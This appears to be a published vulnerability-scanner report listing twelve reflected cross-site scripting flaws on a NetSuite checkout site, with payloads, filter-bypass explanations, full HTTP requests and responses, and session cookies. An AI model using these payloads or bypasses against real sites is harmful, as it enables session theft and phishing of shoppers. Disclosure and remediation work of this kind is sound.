Cross Site Scripting Reports | Hoyt LLC Research


Hoyt LLC Research observes recent activity from IP known and further comment this is a current Click to Execute URI as of 0226 GMT on 3-18-2011

Current 3-18-2011 @ 0226 GMT XSS in checkout.netsuite.com, DORK, Cross Site Scripting, CWE-79, CAPEC-86



Loading


1. Cross-site scripting (reflected)

1.1. https://checkout.netsuite.com/app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f [REST URL parameter 4]

1.2. https://checkout.netsuite.com/app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f [REST URL parameter 5]

1.3. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]

1.4. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]

1.5. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]

1.6. https://checkout.netsuite.com/c.1034828/site/drop_down_menu/anylinkcssmenu.js [REST URL parameter 1]

1.7. https://checkout.netsuite.com/citricle-ga/ [name of an arbitrarily supplied request parameter]

1.8. https://checkout.netsuite.com/citricle-ga/ [name of an arbitrarily supplied request parameter]

1.9. https://checkout.netsuite.com/javascript/help.js [REST URL parameter 1]

1.10. https://checkout.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]

1.11. https://checkout.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]

1.12. https://checkout.netsuite.com/s.nl [vid parameter]



1. Cross-site scripting (reflected)
There are 12 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://checkout.netsuite.com/app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f [REST URL parameter 4]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1205'style%3d'x%3aexpression(alert(1))'04ac6827f1e was submitted in the REST URL parameter 4. This input was echoed as d1205'style='x:expression(alert(1))'04ac6827f1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /app/center/nlvisitor.nl/c.1034828d1205'style%3d'x%3aexpression(alert(1))'04ac6827f1e/n.3/sc.6/.f HTTP/1.1
Host: checkout.netsuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.2.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:25:30 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2036709634:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=966
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 47193


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title></title>


<meta name="robots" content="noindex,nofollow">
<script language='JavaScript' type='text/javascript
...[SNIP]...
<input type='hidden' name='referer' value='https://checkout.netsuite.com/app/center/nlvisitor.nl?c=1034828d1205'style='x:expression(alert(1))'04ac6827f1e&sc=6&n=3'>
...[SNIP]...

1.2. https://checkout.netsuite.com/app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea1e0%2527a%253d%2527b%2527a4e19e91a04 was submitted in the REST URL parameter 5. This input was echoed as ea1e0'a='b'a4e19e91a04 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /app/center/nlvisitor.nl/c.1034828/n.3ea1e0%2527a%253d%2527b%2527a4e19e91a04/sc.6/.f HTTP/1.1
Host: checkout.netsuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.2.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:25:32 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1112271019:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=929
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 14012


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title></title>


<meta name="robots" content="noindex,nofollow">
<script language='JavaScript' type='text/javascript
...[SNIP]...
<a href='https://checkout.netsuite.com/app/center/nlvisitor.nl?c=1034828&n=3ea1e0'a='b'a4e19e91a04&sc=6' class='errortext'>
...[SNIP]...

1.3. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /app/site/backend/docrossdomainredirect.nl

Issue detail

The value of the redirect request parameter is copied into the HTML document as plain text between tags. The payload f1799<script>alert(1)</script>85b0cbdcd5eeb48c1 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /app/site/backend/docrossdomainredirect.nl?redirect=%2Fs.nl%3Fc%3D1034828%26n%3D3%26sc%3D35%26category%3Dloginregister%26it%3DA%26login%3DT%26newcust%3DT87277'><script>alert(1)</script>0d33e5361abf1799<script>alert(1)</script>85b0cbdcd5eeb48c1&docookiecheck=T&renderableItem=%2Fshow%2F8 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.3.10.1290273104; JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; __utmc=1; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com
Host: checkout.netsuite.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:47:52 GMT
Server: Apache
NS_RTIMER_COMPOSITE: -704961802:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=xycPMyJR2XBPh6gH3Bbln7pTqfJz3PcHJpFnLJlWJ4gl5PTxysvL2bZkLNsVZjyG11m2hBJF2gRjn36cGTfh6d1RWCqK05P8KN1ymydhhpXph7JVYqHnpp1L3Hlnm4sQ!-548196153; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=988
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 345

<HTML>
<HEAD>
<meta HTTP-EQUIV='Content-Type' content='text/html; charset=utf-8'>
<META HTTP-EQUIV='REFRESH' CONTENT='0; URL="/s.nl?c=1034828&n=3&sc=35&category=loginregister&it=A&login=T&newcust=T872
...[SNIP]...
</script>0d33e5361abf1799<script>alert(1)</script>85b0cbdcd5eeb48c1"'>
...[SNIP]...

1.4. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /app/site/backend/docrossdomainredirect.nl

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 87277'><script>alert(1)</script>0d33e5361ab was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/site/backend/docrossdomainredirect.nl?redirect=%2Fs.nl%3Fc%3D1034828%26n%3D3%26sc%3D35%26category%3Dloginregister%26it%3DA%26login%3DT%26newcust%3DT87277'><script>alert(1)</script>0d33e5361ab&docookiecheck=T HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cookie: __utma=1.2027734133.1289244024.1289244024.1289251037.2; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:21:44 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 668352325:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=638
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 298

<HTML>
<HEAD>
<meta HTTP-EQUIV='Content-Type' content='text/html; charset=utf-8'>
<META HTTP-EQUIV='REFRESH' CONTENT='0; URL="/s.nl?c=1034828&n=3&sc=35&category=loginregister&it=A&login=T&newcust=T87277'><script>alert(1)</script>0d33e5361ab"'>
...[SNIP]...

1.5. https://checkout.netsuite.com/app/site/backend/docrossdomainredirect.nl [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /app/site/backend/docrossdomainredirect.nl

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 12983'><script>alert(1)</script>f4dd61d6b9f81a0d8 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /app/site/backend/docrossdomainredirect.nl?redirect=12983'><script>alert(1)</script>f4dd61d6b9f81a0d8&docookiecheck=T&renderableItem=%2Fshow%2F8 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.3.10.1290273104; JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; __utmc=1; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com
Host: checkout.netsuite.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:47:52 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 1214680267:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=xycPMyJR2XBPh6gH3Bbln7pTqfJz3PcHJpFnLJlWJ4gl5PTxysvL2bZkLNsVZjyG11m2hBJF2gRjn36cGTfh6d1RWCqK05P8KN1ymydhhpXph7JVYqHnpp1L3Hlnm4sQ!-548196153; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=944
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 233

<HTML>
<HEAD>
<meta HTTP-EQUIV='Content-Type' content='text/html; charset=utf-8'>
<META HTTP-EQUIV='REFRESH' CONTENT='0; URL="12983'><script>alert(1)</script>f4dd61d6b9f81a0d8"'>
<script>function OnBa
...[SNIP]...

1.6. https://checkout.netsuite.com/c.1034828/site/drop_down_menu/anylinkcssmenu.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /c.1034828/site/drop_down_menu/anylinkcssmenu.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67a32"%3b9a1fdcd0d7 was submitted in the REST URL parameter 1. This input was echoed as 67a32";9a1fdcd0d7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /67a32"%3b9a1fdcd0d7/site/drop_down_menu/anylinkcssmenu.js HTTP/1.1
Accept: */*
Referer: https://checkout.netsuite.com/s.nl?c=1034828&sc=35&n=3&redirect_count=1&did_javascript_redirect=T
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cookie: __utma=1.2027734133.1289244024.1289244024.1289251037.2; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Nov 2010 17:28:59 GMT
Server: Apache
Content-Length: 2691
Expires: Sun, 21 Nov 2010 07:15:59 GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
encoding: UTF-8
Content-Language: UTF-8
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=999
Connection: Keep-Alive
Content-Type: text/javascript; charset=UTF-8



...[SNIP]...

alert("Script file 'https://checkout.netsuite.com/67a32";9a1fdcd0d7/site/drop_down_menu/anylinkcssmenu.js' not found");



1.7. https://checkout.netsuite.com/citricle-ga/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /citricle-ga/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5d377'%20style%3dx%3aexpression(alert(1))%20caad02a7c27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d377\' style=x:expression(alert(1)) caad02a7c27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /citricle-ga/?5d377'%20style%3dx%3aexpression(alert(1))%20caad02a7c27=1 HTTP/1.1
Host: checkout.netsuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; loginredirect=T; JSESSIONID=dhQMMyJDpGpPkZGgt12gQSdl2ZxqXVLWRpRGDFyvG6Jv4j6tbFfKcQZD64vmtnhKLhRymJDB9Fv1RDGJXWqCm5hvXJvNQ9fxsVfFB0tVjPwKYx6gZ1fBZsh1JQYRnRZG!-1642534427; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.4.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:50:21 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 326838907:616363742D6A6176613039352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId3=rnoX2rlXAfN9aIpK; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:50:21 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAd5-aEcO; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:50:21 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=983
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 2435


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<a href='/s.nl?alias=citricle-ga&5d377\' style=x:expression(alert(1)) caad02a7c27=1&5d377\'%20style%3dx%3aexpression(alert(1))%20caad02a7c27=1'>
...[SNIP]...

1.8. https://checkout.netsuite.com/citricle-ga/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /citricle-ga/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7175f\'%3balert(1)//122e2e8962c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7175f\\';alert(1)//122e2e8962c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /citricle-ga/?7175f\'%3balert(1)//122e2e8962c=1 HTTP/1.1
Host: checkout.netsuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; loginredirect=T; JSESSIONID=dhQMMyJDpGpPkZGgt12gQSdl2ZxqXVLWRpRGDFyvG6Jv4j6tbFfKcQZD64vmtnhKLhRymJDB9Fv1RDGJXWqCm5hvXJvNQ9fxsVfFB0tVjPwKYx6gZ1fBZsh1JQYRnRZG!-1642534427; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.4.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:50:24 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 776630900:616363742D6A6176613039352E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=993
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 2351


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<script language='Javascript' type='text/javascript'>document.location.href='/s.nl?alias=citricle-ga&7175f\\';alert(1)//122e2e8962c=1&7175f\\'%3balert(1)//122e2e8962c=1&redirect_count=1&did_javascript_redirect=T'</script>
...[SNIP]...

1.9. https://checkout.netsuite.com/javascript/help.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /javascript/help.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49886"%3bd493f9d8869 was submitted in the REST URL parameter 1. This input was echoed as 49886";d493f9d8869 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /javascript49886"%3bd493f9d8869/help.js HTTP/1.1
Accept: */*
Referer: https://checkout.netsuite.com/s.nl
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.4.10.1290273104; NS_VER=2010.2.0; JSESSIONID=dhQMMyJDpGpPkZGgt12gQSdl2ZxqXVLWRpRGDFyvG6Jv4j6tbFfKcQZD64vmtnhKLhRymJDB9Fv1RDGJXWqCm5hvXJvNQ9fxsVfFB0tVjPwKYx6gZ1fBZsh1JQYRnRZG!-1642534427; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Nov 2010 17:50:29 GMT
Server: Apache
Content-Length: 2672
Expires: Sun, 21 Nov 2010 07:15:29 GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
encoding: UTF-8
Content-Language: UTF-8
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=974
Connection: Keep-Alive
Content-Type: text/javascript; charset=UTF-8



...[SNIP]...

alert("Script file 'https://checkout.netsuite.com/javascript49886";d493f9d8869/help.js' not found");



1.10. https://checkout.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %009847a'style%3d'x%3aexpression(alert(1))'ba0bac45916 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9847a'style='x:expression(alert(1))'ba0bac45916 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

